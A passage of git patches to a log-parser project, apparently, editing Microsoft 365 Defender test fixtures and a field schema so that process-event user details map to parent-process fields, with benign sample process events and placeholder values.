-        "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
-      ],
       "ip": [
         "1.2.3.4",
         "5.6.7.8"
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
index cd2ca7981..7acf31f01 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_created.json
@@ -29,9 +29,11 @@
       }
     },
     "process": {
-      "user": {
-        "domain": "autorite nt",
-        "name": "syst\u00e8me"
+      "parent": {
+        "user": {
+          "domain": "autorite nt",
+          "name": "syst\u00e8me"
+        }
       }
     }
   }
diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
index 7d72e6264..5d3587480 100644
--- a/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
+++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events.json
@@ -74,33 +74,32 @@
         "subject_name": "OsVendor"
       },
       "command_line": "\"MpCmdRun.exe\" Scan -ScheduleJob -RestrictPrivileges -DailyScan -ScanTrigger 54",
-      "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
+      "executable": "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2301.6-0\\MpCmdRun.exe",
       "hash": {
-        "md5": "5d5608654828cf052ba013b3c37cbb61",
-        "sha1": "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
-        "sha256": "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e"
+        "md5": "17bd5d291205f95eb9ede9e75d5641d7",
+        "sha1": "81ea1283c9c328fef3ea93e92dc827f1280b32aa",
+        "sha256": "60d88450bc4d6e9bcb83fbcd0342376694dc55eb8f40b0f79580d1df399a7bdf"
       },
-      "name": "MsMpEng.exe",
+      "name": "MpCmdRun.exe",
       "parent": {
-        "name": "services.exe",
-        "pid": 1032,
-        "start": "2023-01-03T08:51:26.740241Z"
+        "command_line": "\"MsMpEng.exe\"",
+        "executable": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0\\msmpeng.exe",
+        "name": "MsMpEng.exe",
+        "pid": 5456,
+        "start": "2023-01-03T08:51:29.269279Z",
+        "user": {
+          "domain": "NT",
+          "id": "S-1-1-11",
+          "name": "System"
+        },
+        "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
       },
       "pid": 37788,
-      "start": "2023-01-04T14:15:10.355033Z",
-      "user": {
-        "domain": "NT",
-        "id": "S-1-1-11",
-        "name": "System"
-      },
-      "working_directory": "c:\\programdata\\microsoft\\windows defender\\platform\\4.18.2301.6-0"
+      "start": "2023-01-04T14:15:10.355033Z"
     },
     "related": {
       "hash": [
         "17bd5d291205f95eb9ede9e75d5641d7",
-        "52bd0a4d149f7913b9c3ba111eff1e75188abfcdc54b927390bc3bfad419860e",
-        "5bfbb0f965e2761d75a51faacc9db6a146a7c5ae",
-        "5d5608654828cf052ba013b3c37cbb61",
         "60d88450bc4d6e9bcb83fbcd0342376694dc55eb8f40b0f79580d1df399a7bdf",
         "81ea1283c9c328fef3ea93e92dc827f1280b32aa"
       ],
diff --git a/Microsoft/microsoft-365-defender/tests/test_local_ip.json b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
index 3cedbfdb3..854ddd181 100644
--- a/Microsoft/microsoft-365-defender/tests/test_local_ip.json
+++ b/Microsoft/microsoft-365-defender/tests/test_local_ip.json
@@ -49,35 +49,20 @@
         "--sandboxed-process-id=2",
         "--use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\""
       ],
-      "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
-      "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe",
-      "hash": {
-        "md5": "51a9cac9c4e8da44ffd7502be17604ee",
-        "sha1": "44543e0c6f30415c670c1322e61ca68602d58708",
-        "sha256": "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
-      },
-      "name": "software_reporter_tool.exe",
       "parent": {
+        "command_line": "\"software_reporter_tool.exe\" --use-crash-handler-with-id=\"\\\\.\\pipe\\crashpad_11111_XXXXXXXXXXXXXXXX\" --sandboxed-process-id=2 --init-done-notifier=804 --sandbox-mojo-pipe-token=********** --mojo-platform-channel-handle=780 --engine=2",
+        "executable": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200\\software_reporter_tool.exe",
         "name": "software_reporter_tool.exe",
-        "pid": 15532,
-        "start": "2022-09-01T06:56:23.595229Z"
-      },
-      "pid": 1664,
-      "start": "2022-09-01T06:56:23.788784Z",
-      "user": {
-        "domain": "intranet",
-        "email": "user@example.org",
-        "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
-        "name": "group1"
-      },
-      "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200"
-    },
-    "related": {
-      "hash": [
-        "44543e0c6f30415c670c1322e61ca68602d58708",
-        "51a9cac9c4e8da44ffd7502be17604ee",
-        "6fe5e57df8d132eaf06f9134461dd172e36cf01679f13eb0f6e70c1f21b18323"
-      ]
+        "pid": 1664,
+        "start": "2022-09-01T06:56:23.788784Z",
+        "user": {
+          "domain": "intranet",
+          "email": "user@example.org",
+          "id": "S-1-00-1-1111111-2222222222-3333333333-4444444444",
+          "name": "group1"
+        },
+        "working_directory": "c:\\users\\USER\\appdata\\local\\google\\chrome\\user data\\swreporter\\102.286.200"
+      }
     }
   }
 }
\ No newline at end of file
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
new file mode 100644
index 000000000..934585ad4
--- /dev/null
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -0,0 +1,99 @@
+{
+  "input": {
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Microsoft 365 Defender",
+        "dialect_uuid": "05e6f36d-cee0-4f06-b575-9e43af779f9f"
+      }
+    },
+    "message": "{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"InitiatingProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}"
+  },
+  "expected": {
+    "message": "{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"InitiatingProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcessRemoteSessionIP\":null,\"IsProcessRemoteSession\":false,\"ProcessRemoteSessionDeviceName\":null,\"ProcessRemoteSessionIP\":null,\"ActionType\":\"ProcessCreated\",\"Timestamp\":\"2024-09-24T14:18:11.864114Z\",\"MachineGroup\":\"test Group\"},\"Tenant\":\"DefaultTenant\"}",
+    "event": {
+      "category": [
+        "process"
+      ],
+      "dataset": "device_process_events",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-09-24T14:18:11.864114Z",
+    "action": {
+      "properties": {
+        "InitiatingProcessCommandLine": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+        "InitiatingProcessFileSize": 11864,
+        "InitiatingProcessLogonId": "0",
+        "LogonId": "0"
+      },
+      "type": "ProcessCreated"
+    },
+    "file": {
+      "directory": "/usr/bin/grep",
+      "hash": {
+        "md5": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
+        "sha1": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
+        "sha256": "8def33333333643356354032379388263138839b9503f269f82e978413d669a0"
+      },
+      "name": "grep",
+      "size": 193333
+    },
+    "host": {
+      "id": "123412341234123412341234",
+      "name": "testDevice"
+    },
+    "microsoft": {
+      "defender": {
+        "report": {
+          "id": "49226"
+        }
+      }
+    },
+    "process": {
+      "args": [
+        "-F",
+        "smtpd_tls_protocols\\commandtest"
+      ],
+      "code_signature": {
+        "status": "Unknown",
+        "subject_name": "Unknown"
+      },
+      "command_line": "grep -F smtpd_tls_protocols\\commandtest",
+      "executable": "/usr/bin/grep",
+      "hash": {
+        "md5": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
+        "sha1": "ff000000000aaaaaaaaaffb100000c0fb25ccccc6",
+        "sha256": "8def33333333643356354032379388263138839b9503f269f82e978413d669a0"
+      },
+      "name": "grep",
+      "parent": {
+        "command_line": "/usr/test/platform-python /usr/lib/python3.6/run.py --register",
+        "executable": "/usr/test/platform-python3.6",
+        "name": "platform-python3.6",
+        "pid": 408996,
+        "start": "2024-09-24T14:18:11.850000Z",
+        "user": {
+          "domain": "testdomain",
+          "name": "testaccount"
+        },
+        "working_directory": "/usr/test"
+      },
+      "pid": 408996,
+      "start": "2024-09-24T14:18:11.864114Z"
+    },
+    "related": {
+      "hash": [
+        "8def33333333643356354032379388263138839b9503f269f82e978413d669a0",
+        "ff000000000aaaaaaaaaffb100000c0fb25ccccc6"
+      ],
+      "user": [
+        "testaccount"
+      ]
+    },
+    "user": {
+      "domain": "testDomain",
+      "name": "testaccount"
+    }
+  }
+}
\ No newline at end of file

From 3542992e5e8802c100a29bc69d866ae366410be2 Mon Sep 17 00:00:00 2001
From: TOUFIKI Zakarya <zakarya.toufiki@sekoia.io>
Date: Wed, 2 Oct 2024 12:18:01 +0200
Subject: [PATCH 102/317] Apply linter

---
 .../microsoft-365-defender/_meta/fields.yml   | 46 ++++++++++---------
 .../tests/test_process_error.json             |  4 +-
 2 files changed, 26 insertions(+), 24 deletions(-)

diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml
index d2c57d50a..89168f3cf 100644
--- a/Microsoft/microsoft-365-defender/_meta/fields.yml
+++ b/Microsoft/microsoft-365-defender/_meta/fields.yml
@@ -816,6 +816,30 @@ microsoft.defender.threat.types:
   name: microsoft.defender.threat.types
   type: keyword
 
+process.parent.user.domain:
+  description: Domain of the account that ran the parent process responsible for the
+    event
+  name: process.parent.user.domain
+  type: keyword
+
+process.parent.user.email:
+  description: User principal name (UPN) of the account that ran the parent process
+    responsible for the event
+  name: process.parent.user.email
+  type: keyword
+
+process.parent.user.id:
+  description: Security Identifier (SID) of the account that ran the parent process
+    responsible for the event
+  name: process.parent.user.id
+  type: keyword
+
+process.parent.user.name:
+  description: User name of the account that ran the parent process responsible for
+    the event
+  name: process.parent.user.name
+  type: keyword
+
 process.user.domain:
   description: Domain of the account that ran the process responsible for the event
   name: process.user.domain
@@ -837,25 +861,3 @@ process.user.name:
   description: User name of the account that ran the process responsible for the event
   name: process.user.name
   type: keyword
-
-process.parent.user.domain:
-  description: Domain of the account that ran the parent process responsible for the event
-  name: process.parent.user.domain
-  type: keyword
-
-process.parent.user.email:
-  description: User principal name (UPN) of the account that ran the parent process responsible
-    for the event
-  name: process.parent.user.email
-  type: keyword
-
-process.parent.user.id:
-  description: Security Identifier (SID) of the account that ran the parent process responsible
-    for the event
-  name: process.parent.user.id
-  type: keyword
-
-process.parent.user.name:
-  description: User name of the account that ran the parent process responsible for the event
-  name: process.parent.user.name
-  type: keyword
diff --git a/Microsoft/microsoft-365-defender/tests/test_process_error.json b/Microsoft/microsoft-365-defender/tests/test_process_error.json
index 934585ad4..c1b661620 100644
--- a/Microsoft/microsoft-365-defender/tests/test_process_error.json
+++ b/Microsoft/microsoft-365-defender/tests/test_process_error.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"time\":\"2024-09-24T14:19:47.7143361Z\",\"tenantId\":\"16ffffff-0000-3333-8888-addddddddd\",\"operationName\":\"Publish\",\"category\":\"AdvancedHunting-DeviceProcessEvents\",\"_TimeReceivedBySvc\":\"2024-09-24T14:18:24.0670725Z\",\"properties\":{\"InitiatingProcessSHA1\":\"ff77777000aaaaaaaaaffb100000c0fb25ccccc6\",\"InitiatingProcessFileSize\":11864,\"InitiatingProcessMD5\":\"eeeee2999444ddaaaaa08598b06eafe7\",\"InitiatingProcessFileName\":\"platform-python3.6\",\"InitiatingProcessParentFileName\":\"platform-python3.6\",\"InitiatingProcessFolderPath\":\"/usr/test/platform-python3.6\",\"InitiatingProcessCommandLine\":\"/usr/test/platform-python /usr/lib/python3.6/run.py --register\",\"SHA1\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FileSize\":193333,\"MD5\":\"ff000000000aaaaaaaaaffb100000c0fb25ccccc6\",\"FolderPath\":\"/usr/bin/grep\",\"ProcessCommandLine\":\"grep -F smtpd_tls_protocols\\\\commandtest\",\"FileName\":\"grep\",\"ProcessId\":408996,\"InitiatingProcessId\":408996,\"ProcessCreationTime\":\"2024-09-24T14:18:11.864114Z\",\"DeviceName\":\"testDevice\",\"DeviceId\":\"123412341234123412341234\",\"InitiatingProcessCreationTime\":\"2024-09-24T14:18:11.85Z\",\"InitiatingProcessAccountName\":\"testaccount\",\"InitiatingProcessAccountDomain\":\"testdomain\",\"InitiatingProcessAccountSid\":null,\"InitiatingProcessSignatureStatus\":\"Unknown\",\"InitiatingProcessSignerType\":\"Unknown\",\"InitiatingProcessParentId\":408229,\"ReportId\":49226,\"InitiatingProcessParentCreationTime\":\"2024-09-24T14:17:34.79Z\",\"InitiatingProcessTokenElevation\":\"None\",\"InitiatingProcessIntegrityLevel\":null,\"AccountDomain\":\"testDomain\",\"AccountName\":\"testaccount\",\"ProcessTokenElevation\":\"None\",\"ProcessIntegrityLevel\":null,\"AccountSid\":null,\"AppGuardContainerId\":null,\"SHA256\":\"8def33333333643356354032379388263138839b9503f269f82e978413d669a0\",\"InitiatingProcessSHA256\":\"3aa8333873527333382433308d52333230354923305566335f7e9f0a732ea565\",\"InitiatingProcessLogonId\":0,\"LogonId\":0,\"InitiatingProcessAccountUpn\":null,\"InitiatingProcessAccountObjectId\":null,\"AccountUpn\":null,\"AccountObjectId\":null,\"AdditionalFields\":\"{\\\"InitiatingProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"testDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixProcessGroupId\\\":408125,\\\"InitiatingProcessPosixSessionId\\\":0,\\\"InitiatingProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"InitiatingProcessPosixUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"InitiatingProcessPosixGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"InitiatingProcessPosixRealUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveUser\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixEffectiveGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0},\\\"ProcessPosixProcessGroupId\\\":408125,\\\"ProcessPosixSessionId\\\":408125,\\\"ProcessCurrentWorkingDirectory\\\":\\\"/testname\\\",\\\"ProcessPosixFilePermissions\\\":[\\\"OthersExecute\\\",\\\"OthersRead\\\",\\\"GroupExecute\\\",\\\"GroupRead\\\",\\\"UserExecute\\\",\\\"UserWrite\\\",\\\"UserRead\\\",\\\"UserAll\\\"],\\\"ProcessPosixFileUserOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"DomainName\\\":\\\"TestDomain\\\",\\\"LogonId\\\":0,\\\"PosixUserId\\\":0,\\\"PrimaryPosixGroup\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}},\\\"ProcessPosixFileGroupOwner\\\":{\\\"Name\\\":\\\"testname\\\",\\\"PosixGroupId\\\":0}}\",\"InitiatingProcessVersionInfoCompanyName\":null,\"InitiatingProcessVersionInfoProductName\":null,\"InitiatingProcessVersionInfoProductVersion\":null,\"InitiatingProcessVersionInfoInternalFileName\":null,\"InitiatingProcessVersionInfoOriginalFileName\":null,\"InitiatingProcessVersionInfoFileDescription\":null,\"ProcessVersionInfoCompanyName\":null,\"ProcessVersionInfoProductName\":null,\"ProcessVersionInfoProductVersion\":null,\"ProcessVersionInfoInternalFileName\":null,\"ProcessVersionInfoOriginalFileName\":null,\"ProcessVersionInfoFileDescription\":null,\"InitiatingProcessSessionId\":null,\"CreatedProcessSessionId\":null,\"IsInitiatingProcessRemoteSession\":false,\"InitiatingProcessRemoteSessionDeviceName\":null,\"InitiatingProcess